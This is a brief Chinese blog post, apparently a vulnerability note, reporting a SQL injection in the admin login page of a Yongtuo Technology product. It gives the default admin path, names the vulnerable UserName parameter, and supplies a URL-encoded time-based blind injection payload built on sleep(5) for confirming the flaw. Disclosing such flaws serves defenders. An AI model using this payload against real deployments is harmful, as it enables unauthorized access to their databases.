1. 程式人生 > 資料庫 >永拓科技後臺登入介面SQL注入

永拓科技後臺登入介面SQL注入

永拓科技預設後臺為ytadmin/login.php

 

 

UserName引數存在SQL注入

可使用%27%2b(select*from(select(sleep(5)))a)%2b%27進行判斷